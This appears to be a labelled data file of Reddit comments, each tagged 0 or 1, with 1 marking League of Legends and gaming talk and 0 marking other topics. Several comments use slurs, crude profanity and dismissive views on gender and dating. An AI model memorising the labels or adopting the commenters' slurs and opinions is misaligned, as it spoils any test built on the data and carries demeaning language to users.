0	I feel empathy I guess, but definitely not sympathy. I also recognize that those demographics aren't the norm. I don't apply this to races or sexes because it's normal to be different in that sense. And although lgbt rights is good, as are all human rights, things like that are up to states since they aren't outlined in the constitutional powers of the government. I wouldn't personally promote lgbt marriage or stuff like that because I disagree with it, but nor would I actively oppose it. New York and anywhere else that wants those issues settled can.
0	I really hate the fact that most of the conversation below your comment seems to ignore the fact that explanation isn't the same as excuse.   If an explanation is found, we can then decide if we believe the reason is a valid excuse for killing a dog... but if no explanation is found, then we don't know if an excuse even exists.
1	Derailing the metaphor a bit, but I've been playing Annie support for a few days and she's very strong. Like a very safe version of Leona with ranged poke. I can also start 5 HP pots and skip philo because her mana regen is already so great, which is nice. Even without items her damage is pretty good and it isn't hard to stun 2 or even 3 times in an extended fight. Tibbers can tank objectives, too.
1	Nice format. I like getting to hear the reasoning Riot had behind the changes. I hope they can keep it up.   Now we get the
1	Valid Points. Basically highlights Twitch's weaknesses and sums up to more of them being in the lateame. Agree to that but still it's worth mentioning that he doesn't fall of hard. Twitch still has a very good lategame.
0	why are you getting downvoted?   they called it recess in elementary, then "nutrition" in middle school/high school. (for me 1990-2001)   in all 3 schools we had lunch too.
1	Both champs are bruisers, and Fiora has the better bruise. It looks like you may have gone against some bad fioras, because she can bruise you and get out, using riposte to shut you out. Riven isn't fast enough to go in an out on a Fiora. Beating a Fiora as riven doesn't even make sense unless you outmatch the user.
0	One or more of the following:     They have 2 incomes   They rent an apartment   They commute a long distance from the countryside     Renting with 2 incomes is probably the most common way.   $70k in Seattle is fine if you're single because you'll be rolling in the dough, however you won't be able to afford purchasing a home. You should be totally good for buying a condo though. (Upper middle class)   If you have a 4 person family, it's gonna be kind of tight if you want to live anywhere near the city. You'll still be OK. No where near poverty level, however you have zero chance of buying a home. Buying a condo would be difficult on that salary. (Lower middle class)
1	my friend has a d1 main and has leveled over 15 accounts to diamond some for $$ and he gets it done everytime in under 100 games. he plays adcarry. you're clearly not good enough but so what. you can always improve. that idiot friend of yours got carried who cares about him. however if he is holding up in diamond now than he deserves it.
1	Have you played or watched a game of Dota? What you're saying is a lot of theory crafting. If you are so focused on auto attacking your own creeps you will miss last hits and thats just not worth it. What you are talking about makes such a small difference in a game of dota that it's pretty much negligible unless you are 100% focused on keeping the creep wave near your tower.   The only time I have ever seen a team do something like this was when there was a Spectre who wanted to farm but his team had no outer towers and the whole team was focused on keeping the lane frozen just outside of their high ground. This involved Chen sending the ranged creep back to base, and Spectre actively trying to keep the lane frozen. They succeeded at doing that, however nobody but Spectre was farming, everyone else was sitting in base helping the Spectre keep the lane frozen just outside of their high ground. They still ended up losing the game because everyone was so focused on keeping the lane frozen so the xp was split and nobody but 1 person got any farm.   >If you're saying that it's not safer to be on your side of the map than the opponent's side of the map-   What I'm saying is that sure you can keep the lane frozen near your tower if you are the hard carry but if the other team wants to kill you, the tower isn't going to help much since it's not LoL towers.
0	While I personally use "Holmes" in some contexts (usually when some smart ass is tryna be sleuthy n shit, as smart ass r often want to do...) but the term originated as a shortened version of "Homeboy", as in 'another person presumably from Africa, ergo "Home", visa vi concurrently "homes" or "homie" visa vi.
0	To me the ad seems pretty straight forward and genuinely about this country being a diverse place.   I'm not going to pretend to know what the marketing team was thinking when making the commercial. But if you look for ulterior motives in anything it's pretty safe to say you can "find" one.
0	With some of my friends we tell racist/sexist/etc. jokes every now and then as an obviously absurd satire of the racist/sexist/etc. viewpoints and it's generally in the context of a conversation about racism/sexism/etc. We never say this kind of shit seriously or out of context (i.e. we're not introducing racism/sexism into random conversations that are otherwise free of it). Satire is all fine and good.   However, I have other friends who say sexist shit all the fucking time and it's pretty unsettling how seriously sexist these otherwise highly educated people are. I try to point it out and they don't get mad, but they also just seem to not understand.
0	I dropped out halfway through my senior year as I wasnt going to graduate anyway. Horrible attendence while still making b's because I was quite knowledgeable and I found it easy. I just had terrible depression and at that point couldnt care enough to give a shit and show up. At 20 I got my diploma through an accelerated learning course and at 23 work for the department of defense and make more than most of my friends who just graduated college. I can't take all the credit for this as those around me pushed me to do better, helped me with my depression, and my fiancée's parents helped me get my IT certs to stop wasting my time. Lots of people drop out for lots of different reasons.
1	I totally agree with your points. I can understand why games can get very frustrating sometimes, but degrading your teammates definitely does not help turn a losing game around. If anything, it just kills morale (or starts a mutiny and then everyone else comes out of the game feeling worse than they would if they had simply had a bad game). I, for one, definitely feel less inclined to really try hard to turn a bad game around if our team is having a ridiculous mutiny. If you are frustrated and really do care about winning, or doing better, then please, please, maybe try to advise the problem players on what they should/shouldn't do (and in a kind manner, please). When I see other players making silly yet significant errors, I do most of the time try to advise them on how to improve. Granted, this is probably not taken very well most of the time -- if taken at all -- due to the inherently ridiculous nature of the internets. I'd rather have my teammate(s) not take my advice than to start an asinine flame war of sorts, though. It also doesn't make your e-peen any bigger to trash on your teammates and if you really get a kick out of degrading your own team over a game I think you may have some issues of your own that you clearly need to address. Trashing on others does NOT make you look better -- it makes you look like a raging idiot. I don't think anyone likes nor respects raging idiots. You are just worsening a game that may already be bad by being a jerk. Learn to breathe and if necessary, please OD on chill pills. kthxbai
1	I play on 180~ ping and it is playable but you will be quite disadvantaged. You can't really micro as well and you will have a 0.2 secs delay before you can react to anything such as flashing out of skill shots and so on. Also, you will miss some CS which you shouldn't had when you could had easily gotten it on low ping. There will be kills that should had been yours and surviving deaths which could had been prevented. It will take time to get used to especially aiming your skill shots.
0	Having accidentally gotten out of the friend zone several times, here's what I've learned.     ALL girls like nice guys. If you're nice, there's no reason that a girl can't find you sexy. Unfortunately, many guys think that nice means that you have to agree with everything she says, never look out for yourself, never talk about sex, and be a needy relationship guy. Would YOU want any of that in a girl?     Assholes can be boring too, and "nice guys" always think that assholes are the victors. Nope. Only the interesting ones. Think about the stereotypical lead guitarist who rides a motorcycle. He has legions of fans that come to watch him perform at night, and he rides a fun machine. He may be a dick to old ladies during the day, but damn - women want to be with him and will deal with the asshole qualities. If he was actually nice too, it'd simply be icing on the cake.     Most guys who identify as sexless "nice" guys are boring. Believe it or not girls like sex. But if you try to build the right situation or subtly lead her to sex or a relationship, you run the risk of making her think that you're being manipulative (even if you're not). Some girls will just shut you down then and there. Other girls look at all you've been doing and go "Wow - FINALLY! A guy that can be a good friend to me without wanting anything more!" BOOM Friendzoned.     I think that women probably can find even fat obese guys sexy as long as they're interesting. If you're on your computer all day and have no friends or outside social life, you don't fall into this category. If you're outgoing, fun, interesting, have hobbies, would rather go out than stay in, AND YOU'LL GO OUT FOR NO PARTICULAR REASON, and you live life fearlessly - then you'll look attractive to women. You don't need to play games (pickup artists), or be skinny. One of my buddies is quite obese, but he's one of the coolest guys I know. I've only seen pictures of his wife, but holy shit - she's hot. And tiny. And you know what? I haven't been buddies with him long, but I can tell that his personality, outgoingness, and the way that I can believe him when he shows me a pic of his hot wife tell me that those qualities are exactly what got him a hot wife (now I have no idea if she's a good wife or not, but she's definitely hot, and 2 kids prove that he's sexing her up).     Being friendzoned permanently by some girl means you're officially out of the running. Crap. Only 3,499,999,999 women left!! WHAT ARE YOU GOING TO DO!?!?! If you're in the friend zone, why not ask her to go out with you to hang (which is what friends do), and she can help you meet some girls (girls like guys who have girl friends by the way).
1	If we are discussing about Quinn's performance in normal games, then we've reached the end of our conversation. If it is the other way around (ranked), then you should pick her against the teams made out of the champions you've listed. That's when she really shines. Just like Vayne & Kog'Maw are good against HP stackers. I'm pretty sure that each of us are accustomed to high risk, high reward champions. Quinn could definitely be labelled as one. She might need some ratio changes here and there, but she is good.  Something else concerns me. Despite the fact that she is somewhat new, her texture is not in line with other champions. I think they should brighten up her human form a little. I really love her Phoenix Skin. Anyways, I would like to know why cannot she turn into Valor whenever she wants (similar to Nidalee's cougar form). I feel like her ultimate CD is quite high.
1	It's quite simple.     Your teammates want to win.  Probably more than you do.     If you're bitching about this subject, your teammates are  definitely  more interested in winning than you are, since you clearly place a high priority on establishing, "It wasn't my fault. Waaaaaah!"     If you are fantastic at Top, but can't play Support to save your life, your teammates are going to let you go top.     Oh Wait, maybe your Teammate is fantastic Top but not so comfortable in Support as well, in which case, quit complaining and play support, THATS WHY PICK ORDER EXISTS.     Maybe if you listed all 5 roles in order of preference, instead of just saying 'mid pls', your teammates would be more willing to work with you.
1	Sounds to me like someone is jealous... If you don't like him, you don't have to watch his videos and if you are annoyed by the outro you can skip it aswell... At least he is someone who still plays the game for fun and is not only tryharding in rankeds and gettin mad when they lose lp. His videos are quite retarded that might be true, but in a funny way. Maybe i like them because the cg guys remind me of my league team :P
1	1, It will take a significant time investment, which also means money investment.  The same people that would be spending all this time working on a "new game" would realistically be the same people working on patches, performance, etc so unless a whole new team is hired for this project the current game will suffer.   2, It would very likely require a whole new account setup, you'd have to figure out how to transfer all of everyones purchases, unlocks, etc into the new system.  You mess this up at all or make people abandon there old stuff you WILL lose customers.   3, Due to it being based around a different engine and setup entirely there would very likely be some differences.  Perhaps minor, perhaps improvements, perhaps major.  At the end of the day while they can duplicate a map, stats, etc games shifting engines will be different.   4, Hardware requirements, its very likely if such an task were pursued the end product would be much harsher on lower end systems.  On a non-gaming laptop you can still play LoL but usually Dota2 would require low settings and potentially be laggy.  This improved version would likely have similar system requirements/specs as Dota2.   In general what this would basically mean is they would be making LoL2.  All of those issues were just top of the head kinda things, thats not even approaching more technical issues like the infrastructure requirements of having connected international server setups accross the globe or anything along those lines.
1	Yep! In fairness, they just didn't perform, but it seriously hurt them as a brand. Its covered a little bit here  (just an interview I happen to be watching).
1	he just explained it?   I like comedy/action movies, you could like horror, someone else romance, etc. It's about personal preference. What I like is not necessarily something you like. I find PL funny and entertaining, doesn't mean you have to. He's just an entertainer, and you're entitled to not like his form of entertainment, just don't expect others to feel the same way you do (read: if you don't like his stuff, you don't have to bother looking at it).
0	I moved 1800 miles away from where I grew up at the age of 21 and haven't looked back. A few friends from back then stayed my friends, and I was much more careful about picking new ones. I don't have a lot of them, but they are wonderful, and my life is so much better. Beyond them, I had a lot of self discovery and growing up to do that staying in my comfort zone was not allowing me to do.
0	As a Torontonian, I think it's fair to admit montreal is actually pretty awesome. It is absolutely better then Ottawa, and from Tofino to newfoundland I'd be hard pressed to come up with a city that is definitively better then there.   In some parts of Quebec most people don't actually speak much english and it would be pretty ridiculous to expect them to reply to you in english. In Montreal lots, but not all are bilingual. My french is not perfect but reasonable enough that I can talk to people in other parts of quebec with little difficulty. When I go to montreal and people hear me speak french they almost always immediately switch to english and it's a bit of a battle for me to be able to practice speaking french there.
1	Hijacking this as I don't see anybody linking to his [Patreon](   There is a ton of people in the comments of the video asking for a Paypal donation acount. This is as close as you can get for continuos suport for his family, and all the hours of fun hes given us thru all this time.   If you don't know what Patreon is,   -
0	My dad bailed for a  crazy  bitch who had previously accused a guy of rape, went to court where it was proven that  she  broke into  his  house, and he was out of the country on the night in question.   Same bitch got drunk, fell and slammed into the sidewalk, accused my dad of beating her. Went to court judge threw it out....they were back together the next day.
1	Idea:   Get over it.   Seriously, this might seem a little rant-y, but this topic is showing up over and over. But, to give a bit of history of the reddit complaintrain.   Complaint: LOL the client suxxorz. Reddit Post Frenzy: LOOK I AM A DESIGNER AND I MADE A NEW CLIENT Reddit Post Frenzy Responses: LOOK AT THAT DESIGNER THAT MADE A GREAT CLIENT IN LIKE 2 DAYS, JUST MAKE IT WORK.   Action: Riot begins to release 'client upgrades' in a new format to be tested and used before a full client release is ready.   Complaint: BROWSERS UGH THIS IS THE WORST IT MAKES A NEW WINDOW OPEN UP.   (rational thought - wait, what? I mean, seriously. This literally doesn't cost you anything. No energy, no money, no time, nothing...)   and on. and on.   Here is the deal. Riot is a developer. They have several development teams. These teams need to work together to make things happen. They also have several concurrent development cycles. These things  are  a cycle.   Writing a custom client takes time. Especially considering that MUCH of the time must be spent making a stable and solid architecture, and SECURITY. I am sure teh designers at Riot have had new desings for a new client done for MONTHS (as my experience as a web-app developer and working with design teams). Creating something in illustrator and then implementing that same stuff utilizing code takes time, even for very accomplished front-end developers. THEN, getting the thing to actually work takes very accomplished back-end developers time.   Further, consider that they are simultaniously developing the API for this so that teh data can be accessed by everyone in an intelligent way.
0	Teacher here: Our high school is using touch screen laptops (screen swivels so they can use it like a tablet). We are in our 4th year now and overall the feedback has been mostly negative.   There are 2 major complaints from the teachers     The majority of the teachers fall into the "if it ain't broke, don't fix it" category. They've been teaching without tablets for years the extra complications aren't worth the effort/cost. Imagine trying to make algebra more interesting than playing with a computer.   Those of us who do use the tablets extensively (since I teach a lot of programming I fall into this category) find that the students break their tablets way too often. Nearly every class I have at least one student who can't do their work because their tablet is being repaired, not working, not charged, or they left it at home. Most adults I know can't take care of  laptop for 4 years... now imagine a 14 year old with his own personal laptop. Back when we taught programming on school owned desktops these issues were non-existent.
0	um?  The post itself is already mimicing the Overly Photogenic Inmate (guy) meme which itself was already mimicing another Overly Photogenic Inmate (girl) meme, so I don't see how you can possibly make any point about how girls are more ridiculous than men, or vise-versa.
1	I have a general rule when playing Karthus, never ever ever try to 1v1 someone. Maybe if they happen to be really low and you are healthy but otherwise just don't do it, their adc, ap carry, top lane bruiser and jungle can all 1v1 you with ease, its even hard to trade even with your ult after you die.   Karthus can carry games, he is a late game God, but is still the easiest to kill if he isn't protected. Karthus is the teamfight king with all that AOE, with Seraph's Embrace and Zhonias you can make sure you live long enough to deal that teamfight damage. Your ult can hit for 1000 dmg with a full build.   Until teamfight time, I feel like the best way to play is to farm right beside your tower with Q, using E to make sure the wave doesn't push to your tower. Exhaust and flash along with the fact that you are always beside your tower will make it hard for them to dive you even 2v1.   Personally I think that since he is so weak early and so strong later the ideal setup is scaling ap runes with some spellvamp to sustain in lane and last longer in those teamfights.
0	You're probably right. Although, the friendzone does exist. You are in it with anyone you are friends with. It is bothersome only when you don't want to be in it. i.e., you want the relationship to be of a romantic nature as opposed to a platonic one.   I never said anything about boning anybody in my initial, or any subsequent, post. I also never said that anyone was placed there wrongly. That would be silly. That would imply that the person who "placed" you there is incapable of making real decisions. That's fucked up and definitely undermines that whole respect thing I went on about.   The people who were "wrongly" placed, i.e., eventually got out of the friendzone, were not wrongly placed. They had incompatible feelings for some point in time, which got them in the friendzone and once that incompatibility was reconciled in favor of their initial intent, they were removed from it.   Although, to be honest, if you want to be serious about your definitions, we might want to define the friendzone as a metaphorical zone that you are placed in once a friendship develops with someone. You can define it this way in which case it's very similar to a mathematical relation. i.e. Stanrock(F)Rockstan if and only if Stanrock and Rockstan are friends. Essentially meaning that you would be placed into the friend zone as an ordered pair. This relation would be reflexive and symmetric for the sake of sanity. (You are friends with yourself and if A is friends with B then B is friends with A)   Then you would either still be friendzoned once a romantic relationship is reached, in that you're probably still friends with said person, or, upon leaving, you relinquish all friendship, you could do this by ending the friendship or  you may not see that a friendship is contained within a romantic relationship. So, maybe I should alter that definition.   Perhaps a friendship that one, or both, parties believes is incompatible with a romantic relationship. This relation would be similar although it may not be reflexive. You might think that you and you can be in a romantic relationship, I'm not judging you. So, in this case, the bothersome friendzone elements would be (a,b) such that (b,a) is not in the friendzone. i.e. a is strictly platonic friends with b but b is not strictly platonic friends with a.   Alternatively, each person could have their own friendzone which would just be a set of the people they have strictly platonic feelings for. Either way, it seems that friendzoning could never be wrongly done.
0	In 4th grade art class we were using x-acto knives for something and my friend asked me where something was that we needed for the project. I whipped around to point the shelves behind me and accidentally cut her with the knife. My friend was fine, but I felt awful and started crying. My friend went to the nurse for a bandaid. The nurse asked what happened and she said, "Earboy cut me with an x-acto knife." The nurse's eyes got really wide and my friend was like, "OH NO IT WAS JUST AN ACCIDENT SHE'S NOT CRAZY OR ANYTHING!"   It was too late though. The nurse told the principal who called me to the office, along with my parents and the art teacher. I was a serious goody-two-shoes, I'd never gotten in trouble for anything, so idk how they thought I actually cut someone intentionally. It took like 2 hours in that office for me, my friend and the art teacher to convince everyone that it was an accident. We ended up having to go to a peer mediation session anyway.
0	I'm a (light) smoker, and there's just a couple of points I would like to bring up to re-iterate them because they are common misconceptions among non-smokers.  I'm also much more conscientious than average, but even I do stupid shit that I know is objectively wrong sometimes.  So do you.  Calm down.   1.) Cigarette butts smell bad.  Really bad.  Way worse than human butts.  If you think smoke smells bad, go pick up a cigarette butt and put it in your pocket, or in a trashcan inside your home.  There is nothing about this that you will be able to tolerate.  Most smokers learn this quickly because they have attempted to be nice to the environment, pinched out their cigarettes, and stuck them in their pockets to put them in a trash can later, and then forgotten about them for several hours.   2.) Smokers today do so under a sphere of shame and guilt in almost all remotely public places.  When someone 100 yards away looks at me and starts coughing while I am smoking, this is ideopathic bullshit.  So we hide while we do our habit.  We find the dark corners, and then we hide our butts when we are done.  This is my general habit if there is no receptacle nearby.  Especially if I am around people who are going to get weird and awkward if they find out I smoke.   3.) The little post things with a hole that a cigarette just barely fits in?  Look, I care about the environment, and I try.  But honestly, a good 50 percent of the time I actually just FAIL at putting the cigarette in the hole.  It falls on the ground.  Sometimes I pick it up if I'm not already in a hurry, sometimes I don't.  Especially when it's -10 outside and my fingers have stopped working from trying to smoke outside.  What works great is ash trays, or buckets of sand.  I prefer buckets of sand.
1	i just introduced a friend to league of legends. the amount of fun im having while teaching someone the basics of league (what's cs? what's a tank? that sort of stuff). League instantly become more fun for me, because with the basic knowledge i have, i can teach this kid how to play the game.
1	This was a very good read and I used to feel the same way when I started playing last May/late April. Just in time for Dreamhack and a week where I was house sitting for some folks with bitching internet. Watched almost every match in the tournament, obsessed over every little thing, got pumped for Yorick and a week later I bought about 100 bucks of RP to buy one of those champ packs and rune page bundles.   By that August I had finally slowed down. Not really playing on my own, but only when my buddy was online. It wasn't worth the headache when I didn't know I had at least one solid (semi-solid, he does some stupid shit now and again) player to stand with me.   Now I only play when one of my friends are on. Its still fun, but the pressure isn't as crushing. Its fun.   I still got pissed about AFKs, trolls, and fucking stupids though. Eventually, I started taking some of the advice you see thrown around Reddit now and again and trying to stay calm. It really does help, even though its hard to do sometimes.   Had this one game a few weeks back where I was Lee Sin jungle. Udyr top, some AP mid (maybe Ziggs?), and JAX/ANIVIA bot lane! Originally, Jax was going to be top, Ziggs mid, me jungle, and Ez/Raka bot lane, but at the last second they locked in Udyr/Aniv. Aniv rushed bot and Udyr top and so it was done! At first I asked my friend what the fuck they were doing and he responded with, "BEING GODDAMN FUCKING ASSHOLES IS WHAT THE FUCK THEY'RE DOING". And, yea, assholes they were. I had some solid ganks early, but shortly after died in an ill-fated gank where the Udyr peaced out. That caused both the Udyr and the Anivia to start trashing me the whole game. Even after making big plays, these dudes talked shit. "You're fucking trash." "Fuck you're retarded." But...   I didn't get mad. I laughed it off, tossed some bros their way, and it sorted of didn't touch me. They were still huge dicks, even after we won (I called for Baron and went beast mode for a bit, previous game we almost won a 4v5 because of my awesome Lee Sinnin' so I was feeling confident).   Despite their dickery, I felt good about the game. My buddy still gets mad when people don't follow the meta, but I've been able to calm down about the game. I tell him to calm down and it'll be easier, but he's sort of excitable about shit and isn't interested in doing so.   I guess my point is this: you'll make some sort of peace after playing the game for a bit. Its good that you and your boyfriend have that "us against the world" mentality. It'll help for a bit. Its okay to be mean for a while. You gotta get that shit out of your system. Eventually, you'll realize being nice (or at the very least NOT super mean) will stop some of the trolls from trolling too hard, though not all of them. It'll become a game where you can have fun even during a loss, but you gotta be willing to learn from the losses. If you view them as just a waste of time then you'll start getting angry again.
0	Story time.   I moved out of my parents house when I was 21 years old. I went from being very responsible the first few months to a raging alcoholic partying every weekend, like any reputable young lad would do at that age. On one occasion, a good friend of mine lost control of himself and threw up all over the bathroom. I mean everywhere; what he did could be considered a modern art masterpiece.   The next morning, I wake up very early and step over all the people laying on the floor. I felt like I was walking through a liquor-laden battlefield. I go into the bathroom, still very drunk, and realize that I need to get that bathroom cleaned immediately. I found all the cleaning supplies I could find and mixed them all in the bath tub; we're taking bleach, window cleaner, Ajax, ammonia, you name it.  All of a sudden everyone in my living room wakes up coughing and wheezing (as I am, too, scrambling to open up the windows). It was like waking up the dead. So, don't mix chemicals together. You could kill your drunk friends, along with yourself.
0	As most people have alluded to, talking to customers is part of the business. Humans are social creatures and the majority of people don't mind talking to someone else. By talking, the hair stylist has an opportunity to create a relationship with his/her customer and if the customer likes talking to that stylist, then they are more likely to come back to them or specifically ask for them. It also allows the hair stylist to perhaps suggest hairstyles that are more suited to the customer's personality/lifestyle. Obviously, the customer can direct the stylist into the style he'd prefer, but the stylist is the professional and in the end, it really does depend on how he perceives the situation and what is optimal course of action. And more to that point, if you are quiet, then you probably are not as likely to even direct the stylist (since you know, you're too quiet) which can lead to a customer that although may not hate the cut, won't love it either. I find it much easier to suggest or direct my hair stylist when we are already talking rather than abruptly saying "What are you doing?"  It's way cheaper and results in more stable income if you  retain customers rather than have to constantly seek out new ones. If I were a stylist and some random customer came in, asked for a haircut, said nothing throughout the experience, paid and just left, then I would not feel confident that the person will come back as opposed to a customer that just happened to share my passion for Mongolian throat singing and talked to me about it throughout the entire haircut. In one instance, the stylist is just a faceless, nameless, replaceable service in the situation, they can become something more.  Obviously, there are some people who prefer to be silent and some stylists will pick up on that, but it's a much safer strategy for the stylist to first assume that you prefer conversation and then alter the strategy depending on the response. I'm normally a reserved and quiet person, and it's very easy for me to slow a conversation down entirely simply by the attitude I choose to have and I've done that numerous times with past hairdressers, coincidentally, more often than not, I used to leave my hairdresser not entirely satisfied with the hair cut.
1	It's nice to main one or two roles with 2-3 champions within that role. But have at least 2 roles u can play and are confident in. Playing only one champ and that champ only is sometimes not a bad thing if your grinding ranked, but have a little diversity in the long run. The grind to 30 was difficult for me because my first main was support, and I had no one character; I had never found what works for me. Only after I got to 30 I started using "mains" (which are not just characters that u spam, they are characters that you are confident in playing, and also have fun playing them).   So, find characters u like. Play them but find enough so when u get to level 30, u can have fun with those characters and not only play one. It can get frustrating when u don't do well with any champion besides that main, but never lose hope! Test with different characters, and find what YOU like.   Inevitably, u WILL get better as long as u don't be toxic and have fun with the game. I don't know what character your brother tells u to spam, what lane it's in, his rank, or whatever, but in the long run it's good to have fun with your mainS. If you don't have fun playing them, it can cause u to get back to finding new mains which is were I was stuck at, and that is somewhat dissatisfying. Again, whether u play the game casually and like to have fun, or competitively and have fun ranking up, the game is still about fun. A very mis-concerted idea because some people thinks that fun means trolling. Which is very wrong.
1	When my team queues, we generally have a dedicated bot already. I can't stand (I'm mainly the AD) getting our pug to do support, only to have him be something stupid like Nunu (I know he's viable, doesn't mean I like him) or worse...  shudder  Karma...
0	My cousin works at a cafe and her new manager started dealing out of the back.  He also started making completely inappropriate advances toward the female employees.  Everybody was terrified of being fired but finally said something.   You know what the upper management did?  They sat him down and went over every single complaint they'd received with him, including the NAME OF THE EMPLOYEE THAT MADE THAT COMPLAINT.  Then they said they'd make a decision within two days and during that time he'd continue to manage, KNOWING EVERYTHING THAT EVERY EMPLOYEE HAD SAID ABOUT HIM.   It was completely horrible, and my cousin was lucky to have those two days off so she didn't have to be present for it.  Luckily he did end up getting fired.
1	Having a problem with someone in a bush? Get a lantern.  Having a problem with CC? Get a QSS/Cleanse.  Problem kiting? Get a BotRK or a Frozen Mallet.  Want to teach new players the map control they need for SR? Then there isn't a better place to learn than SR.  TT is designed to be a different map altogether, not a smaller version of SR.  New players do not get overwhelmed on SR.  I know this because I am teaching 2 people at the same time, both of whom are new to MMOs.  They are not overwhelmed because they have someone to help them learn.  They have already learned many of the basics and are working on understanding the meta and the champions.  There are no bad students, only bad teachers.
0	This actually can work in theory, but it would be really hard in practice.   To discharge a tax debt, you have to meet certain conditions:     1) The debt must be more than 3 years old   2) You must file the return on time - if not the 3 years starts when the return is filed   3) The IRS cannot have a lien against your or audited that year.   4) If audited - You have to wait an additional 3 years for that to pass. As well, it can't reflect any criminal activity.   5) If a lien is placed, you're kinda fucked. See below.     Discharging an IRS lien:   The IRS has a right to  ALL  equity in  ANY  property you have. This means any personal effects (even your clothes) are given a value, and you must repay that amount back.   If you have a car or house, whatever equity you have in those assets must be paid to the IRS. Usually, the best you're hoping for is to try an cut the amount owed in half - provided you don't really own much.
0	So, the Maple Leafs are a hockey team from Toronto. A very storied and history rich hockey team that has had a lot issues in the past couple decades (management, bad player deals, etc.) You basically have to really hate yourself to be a Leafs fan at this point, especially after the events that unfolded the post season this year...   Now Vancouver has their own hockey team: the Canucks. An expansion team without the history that the Leafs have, but with good management they've been a competitive force in the Western Conference. They, however, cannot seal the deal in the post season and have yet to win a Stanley Cup in their entire club history.
1	I've played about 400 aram games (ya I know, addicted) and I used to think the same.   However if you factor in how the process which Riot uses to give you a "random" champ then you realize why you may get less "OP" champs than is expected.   edit: Riot has not specifically said EXACTLY how the process works, but this is what I've gathered from reading red posts   Basically your initial champ is random, but it cannot be the same champ that is on the opposing team. Players tend to not reroll the most popular champs -Jayce, Nid, Lux, etc- and subsequently reroll if they have unpopular champs -melee tanks with no gapclosers, etc.   So if the other team uses rerolls to get popular champs before you reroll, then they have a better chance of getting popular champs while also increasing your odds of getting unpopular champs.
1	Start to think that you are the problem. Blame you for (almost) everything your teammates do wrong. Try to find a way to make their bad move, a good move. I'm in diamond and it's not elo heaven as you could think. There are still people who has some bad games, and it's even harder to carry.
1	The fight was Nice, but you actually used a way to edit that i've always loved so far (with the bot voice) and Turned it into a god awful clip.
1	I'd like to weigh in on this as a Magic the Gathering competitor - (specifically talking about Standard here)   In MtG, Wizards releases a new banned/restricted list on a strict schedule: 4 times per year.  New sets are released at about the same rate (though these two never happen at the same time on purpose).  When the new sets come out, the older sets also rotate OUT.   This is basically the equivalent of Riot releasing five new champions at once, 3-4 times per year, then only having one path between each release.  Tournaments would be held with only specific champion pools of 20-30 champs + a core ~10-15 that are always available.   The effects of this schedule are basically that a new metagame forms every set release.  There is huge variance in every tournament.  New metagames encourage old players who stopped playing to join back in because a similar archetype is back, and there is a much lower amount of knowledge necessary to understand the entire meta.   The positive effects for RIOT should they implement this:     More new champion sales.  Since more champs will be viable in tournaments, more will sell.   More viewers for tournaments.  People will tune in just to see what new cool stuff the pros come up with, not just to see the same thing every time.   Tournaments which value creativity combined with skill over raw skill.  This deepens the mental aspect of the game and will create a whole new breed of tournament players, meaning more pros for RIOT to benefit from.
1	There is a five million dollar prize pool and they don't have the money for something is not a very good argument.   I can't understand what in my post makes me hate riot.  Why can't I be annoyed that the servers are down twice for the same patch in a week without being labeled as a spoiled child by most of the community?  I'm not enraged at riot. I am concerned, but perhaps that is because for me this game  isn't  free.   But please, stop confusing what are legitimate complaints about about a company's product as whining and pettiness only because their business model is different from World of Warcraft.
1	I am saying that Riot said Manasteal would be unbalanced in an old meta where every champion relied on mana to use their abilities and it costed a LOT.  But all of a sudden we have a new meta where soft CC is useless because every popular champion has some sort of gap opener / closer and can build tenacity to never have to stop.
1	Dont take MR in lane as an AD carry. You take very little magic damage, and a null magic mantle is 24MR for 400g.   And dont take scaling MR as a solo lane, you want flat MR to reduce the damage you take as harass from 1-6. Scaling MR is best for junglers who wont take much/any magic damage until 6+.   Basically, having +13MR at level 1 is better than having +13MR at level 9. After level 9, purchasing additional MR (ie: mercs, wits end, spirit visage) make MR runes redundant and "devalue" the runes themselves because damage reduction isnt linear scaling additive.   The time that you need/want that MR, is to stop and shut down harass from AP champs like Anivia, Annie, Kass, etc during laning phase 1-7.
1	Hey Blackrook!   One thing i was wondering was about the champion originally being "set-in-stone", so to speak. I was queueing with a friend of mine today, and while i initially wanted to AD, it took us ages to find a jungler, so i thought i'd swap to jungle to make the process faster. However, this does not seem to be possible without making a new lobby, and hence having to leave any random members behind, along with having to invite again. This is not the biggest of issues, just a thought for improvement.
1	Just because he does x claims a day doesn't mean they were done instantaneously.   Also, it depends on the company, type of claim, amount of money and the amount of damage.   Took 2 months for our insurance to cover the flood damage in our basement as they tried to confirm the value of the things we claimed and argue against some - eventually paying the  maximum amount  of $10,000. note: Maximum, which I'm sure homeowner's insurance has a maximum for fire damage too?   Insurance never pays a full amount, it's not like God reaches down and grabs your hand and says 'it'll be okay, here is $238,495, that covers everything'. There's maximums, there's things that can't be valued, also many different costs that will come into play when your house goes on fire.. like hotel bills, possible hospital bills, etc.  Hit kids lost everything they own - and who knows how much damage was done to the house.   None of this is paid in full, and most of the time not anywhere near full. Like my mom was in a car accident where a gravel truck going 40mph ran into her at a stop sign. The guy was drunk, had suspended license, etc. They paid out a lot of money that was supposed to cover her health problems/car/future health problems.. but she has probably had to spend twice that amount just on hospital bills alone.
1	Yes and that tiny yordle controls the powers of lightning.   Your friend sounds like the kind of person that can't watch a movie set somewhere other than present day Earth and just points out all the things that aren't the same.
0	Similar thing happened to me a couple months ago. I was serving what was supposed to be an eight top that had turned into a twelve top, so they didn't all fit around the table very well. I carried a full tray of various wine glasses and started placing them on the table. Each time I would lean in to place a glass I would say "excuse my reach" or "right behind you" because I had to lean kind of far to get to the table.   So I get about a quarter of the way around the table and as I'm placing a glass down this lady decides its a good time to stand up. She knocked over the rest of the glasses all over herself. She left to go change, and I was mortified because I have never spilt ANYTHING at a table before. The table assured me it was her fault, and left me a great tip, but I still felt awful.  I should be clear that she seamed pretty pissed when she left to go change, but everyone else kept telling me they saw it was her fault.
